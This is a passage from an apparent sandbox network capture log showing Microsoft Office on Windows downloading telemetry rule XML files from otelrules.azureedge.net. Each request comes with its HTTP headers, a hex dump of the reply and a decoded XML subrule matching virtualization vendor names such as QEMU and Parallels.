                                                                                        2024-11-30 11:48:27 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        65192.168.2.44981413.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:26 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:27 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:26 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 470
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                        ETag: "0x8DC582BBB181F65"
                                                                                        x-ms-request-id: 6dbf519d-601e-0084-1b91-3f6b3f000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114826Z-174f78459684bddphC1EWRbht4000000113g000000006xr9
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:27 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        66192.168.2.44981513.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:26 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:27 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:27 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 427
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                        ETag: "0x8DC582BB556A907"
                                                                                        x-ms-request-id: aaf8d828-401e-0016-61be-4253e0000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114827Z-174f7845968n2hr8hC1EWR9cag0000001140000000000yvn
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:27 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        67192.168.2.44981613.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:28 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:29 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:28 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 502
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                        ETag: "0x8DC582BB6A0D312"
                                                                                        x-ms-request-id: 63854d8c-901e-007b-2581-3fac50000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114828Z-174f7845968kdththC1EWRzvxn0000000dqg000000006d1n
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:29 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        68192.168.2.44981713.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:28 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:29 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:29 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 407
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                        ETag: "0x8DC582B9D30478D"
                                                                                        x-ms-request-id: 14d8e695-801e-008c-6b91-3f7130000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114829Z-174f78459685726chC1EWRsnbg00000011bg0000000097nz
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:29 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        69192.168.2.44981813.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:28 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:29 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:29 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 474
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                        ETag: "0x8DC582BB3F48DAE"
                                                                                        x-ms-request-id: a2105f9f-201e-00aa-1591-3f3928000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114829Z-174f7845968cpnpfhC1EWR3afc00000010z00000000077y9
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:29 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        70192.168.2.44981913.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:29 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:29 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:29 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 408
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                        ETag: "0x8DC582BB9B6040B"
                                                                                        x-ms-request-id: cf0a4750-201e-005d-5b07-42afb3000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114829Z-174f7845968kdththC1EWRzvxn0000000dmg00000000ar6u
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:29 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        71192.168.2.44982013.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:29 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:29 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:29 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 469
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                        ETag: "0x8DC582BB3CAEBB8"
                                                                                        x-ms-request-id: ccb4b789-101e-0028-02af-428f64000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114829Z-174f7845968px8v7hC1EWR08ng00000011mg0000000075sf
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        X-Cache-Info: L1_T2
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:29 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        72192.168.2.44982113.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:30 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:31 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:31 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 416
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                        ETag: "0x8DC582BB5284CCE"
                                                                                        x-ms-request-id: 0cb5bd73-401e-0067-3644-4209c2000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114831Z-174f7845968xr5c2hC1EWRd0hn0000000k600000000077g6
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:31 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        73192.168.2.44982313.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:31 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:31 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:31 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 432
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                        ETag: "0x8DC582BAABA2A10"
                                                                                        x-ms-request-id: fe673556-401e-0029-33ec-419b43000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114831Z-174f7845968px8v7hC1EWR08ng00000011k0000000008gv6
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:31 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        74192.168.2.44982213.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:31 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:31 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:31 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 472
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                        ETag: "0x8DC582B91EAD002"
                                                                                        x-ms-request-id: 55122f27-801e-0083-61b2-42f0ae000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114831Z-174f7845968glpgnhC1EWR7uec00000011gg000000006yc6
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:31 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        75192.168.2.44982413.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:31 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:31 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:31 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 475
                                                                                        Connection: close
